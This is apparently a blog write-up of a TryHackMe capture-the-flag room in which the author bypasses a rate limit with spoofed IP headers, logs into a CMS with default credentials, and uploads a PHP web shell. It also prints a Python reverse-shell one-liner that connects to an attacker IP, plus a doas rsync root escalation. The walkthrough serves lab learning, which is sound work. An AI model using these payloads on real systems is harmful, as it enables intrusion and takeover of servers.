Sustah -TryHackMe

Play a game to gain access to a vulnerable CMS. Can you beat the odds?The developers have added anti-cheat measures to their game. Are you able to defeat the restrictions to gain access to their internal CMS?

Where to find this room?

https://tryhackme.com/room/sustah

Enumeration

NMAP

# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p- 10.10.59.72

# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p22,80,8085 10.10.59.72

Directory Busting

⇒ ffuf -u http://10.10.112.173:8085/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -c

Here we have port 80 and port 8085, both hosting some kind of Website. Exploring web-page at port 80 doesn't reveal anything and web-page at port 8085 gives us a spinning wheel and an input field to guess a number.

Put some arbitrary number in this input box and observe the request response in Burp Suite:

In the response we can see some headers are returned as highlighted above which points to rate limit checks being applied by the server. To check this,tried brute forcing this input field using the Burp Suite Intruder and we got hit by the rate limit set at the server. So the way forward is to bypass this rate limit set at the server end. After searching around found this Burp Suite extension code and experimented with all the headers which can be added to the request to bypass rate limits:

https://github.com/TheKingOfDuck/burpFakeIP/blob/master/fakeIP.py

There are many headers which can be added and these can contain different or Random IP Address to bypass the restrictions.These are:

X-Forwarded-For
X-Forwarded
Forwarded-For
Forwarded
X-Forwarded-Host
X-remote-IP
X-remote-addr
True-Client-IP
X-Client-IP
Client-IP
X-Real-IP
Ali-CDN-Real-IP
Cdn-Src-Ip
Cdn-Real-Ip
CF-Connecting-IP
X-Cluster-Client-IP
WL-Proxy-Client-IP
Proxy-Client-IP
Fastly-Client-Ip
True-Client-Ip
X-Originating-IP
X-Host
X-Custom-IP-Authorization

For our case adding the header “X-remote-addr: 127.0.0.1” proved useful and adding this in the request makes the rate limit headers in the response from the server to disappear:

Chance of winning given in the wheel is 0.004% which is 1 in 25,000. Now we can brute force this using a simple python script that utilities the python requests module to do POST requests to the server, we will take the number range from 10k to 25k(A more smarter strategy could be to break these ranges in to small chuck and try the script):

This indeed gives us out number and inputting this number gives us the path:

We found this directory on the default http port i.e. Port 80 and that revealed the CMS which was asked in one of the questions.Let’s used FFUF to find out if we can find any other directories and files under this path using the following command:

┌──(kali㉿kali)-[/tmp]
└─$ ffuf -u http://10.10.91.116/Y***********h/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .php,.html,.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.1.0
________________________________________________
:: Method : GET
:: URL : http://10.10.91.116/Y***********h/FUZZ
:: Wordlist : FUZZ:/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Extensions : .php .html .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403
________________________________________________
about.php [Status: 200, Size: 8727, Words: 980, Lines: 130]
contact.php [Status: 200, Size: 7686, Words: 762, Lines: 117]
blog [Status: 301, Size: 325, Words: 20, Lines: 10]
img [Status: 301, Size: 324, Words: 20, Lines: 10]
sitemap.php [Status: 200, Size: 1446, Words: 119, Lines: 27]
css [Status: 301, Size: 324, Words: 20, Lines: 10]
template [Status: 301, Size: 329, Words: 20, Lines: 10]
index.php [Status: 200, Size: 14021, Words: 1505, Lines: 207]
log [Status: 301, Size: 324, Words: 20, Lines: 10]
theme [Status: 301, Size: 326, Words: 20, Lines: 10]
changes.txt [Status: 200, Size: 627, Words: 103, Lines: 11]
plugin [Status: 301, Size: 327, Words: 20, Lines: 10]
undo [Status: 301, Size: 325, Words: 20, Lines: 10]
.php [Status: 403, Size: 277, Words: 20, Lines: 10]
.html [Status: 403, Size: 277, Words: 20, Lines: 10]
[Status: 200, Size: 14017, Words: 1505, Lines: 207]
:: Progress: [882184/882184] :: Job [1/1] :: 1558 req/sec :: Duration: [0:09:26] :: Errors: 0 ::

Browsing to change.txt files found above, we found the version number of the CMS which was also asked in the questions:

We have a CMS and it’s version number. Using searchsploit we can see that this CMS is vulnerable to Remote Code Execution (Authenticated) and the exploit is available here:

https://www.exploit-db.com/exploits/48780

Reverse Shell

Exploit is simple.From the above link steps are:

1. Login on CMS. Default credentials are:
Username: admin
Password: changeme

2. Navigate the file upload functionality (http://target/codebase/dir.php?type=filenew) and upload a file called ‘webshell.php’ with content ‘<?php system($_GET[“cmd”]); ?>’.

3. Execute remote commands by navigating:
http://target/webshell.php?cmd=whoami

Reaching to the place where to upload the shell is bit tricky. Follow this:

  • Go to the sitemap.php
  • Then go to TestPage it will take to the URL http://10.10.85.125/Y***********h/lorem.php. Click on “Log in with” link on this page.
  • We will reach to this page: http://10.10.85.125/Y***********h/lorem.php?login=admin. Use admin/changeme as the credentials,ignore the password change prompt by clicking on “Cancel”.
  • Go to File->New and here we will be able to upload our webshell.php which will have the following php code:

<?php system($_GET[“cmd”]); ?>

  • And access the web shell as following to check if we have RCE:

http://10.10.85.125/Y***********th/img/webshell.php?cmd=whoami

We can see from above that we indeed have RCE on the server. Lets get a reverse shell by using the following python code instead of “whoami” command:

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.8.98.192”,9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

Also start a netcat session on port 9999 on our attacker machine before running the above code:

nc -nlvp 9999

We got our Reverse Shell:

Upgrade Shell

We got a basic shell with limited functionality. Let's upgrade it to a more stable shell by running the following commands:

/usr/bin/script -qc /bin/bash /dev/null
control+z to background
stty raw -echo
fg
export TERM=xterm

Privilege Escalation

User Flag

We can see a user named “kiran” under /home and can also see that there is a file named “user.txt” under /home/kiran only readable by kiran. So clearly we need to do Horizontal Privilege Escalation first to user kiran. Tried few privilege escalations scripts but nothing obvious poped up,so following the hint in the room looked for backup using the locate command and found a backup password file which did contain the password for user “kiran”:

Using the password found did switch user to kiran and got the user flag:

Root Flag

Transferred LinPEAS.sh on target ran it.The following doas.conf configuration is highlighted as a most probable privilege escalation vector:

From https://man.openbsd.org/doas.conf.5, doas utility executes commands as other users according to the rules in the doas.conf configuration file. The above doas.conf permits user kiran to run rsync as root without a password.From GTFO bin got the following command and ran it to get root:

doas rsync -e ‘sh -c “sh 0<&2 1>&2”’ 127.0.0.1:/dev/null

That it. I liked this room very much as it is more on a practical side of thing where we have to do rate limit bypass which was lot of fun. Hope you have also enjoyed this write-up.

--

--

--

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

🧾 Weekly development report. 🧾

Introduction to SQL Injection Attack

How to survive your first data breach

{UPDATE} Wood Pottery Shop Hack Free Resources Generator

{UPDATE} German Whist Premium Hack Free Resources Generator

READ/DOWNLOAD%@ The Cryptoclub: Using Mathematics

How To Add Two Factor Authentication (2FA) To LocalBitcoins

Security and Privacy in IoT

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
0xsanz

0xsanz

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

More from Medium

TryHackme: Annie

Network Services — Tryhackme

TryHackMe VulnNet:Dotpy

TryHackMe: [Day 14] Networking Dev(Insecure)Ops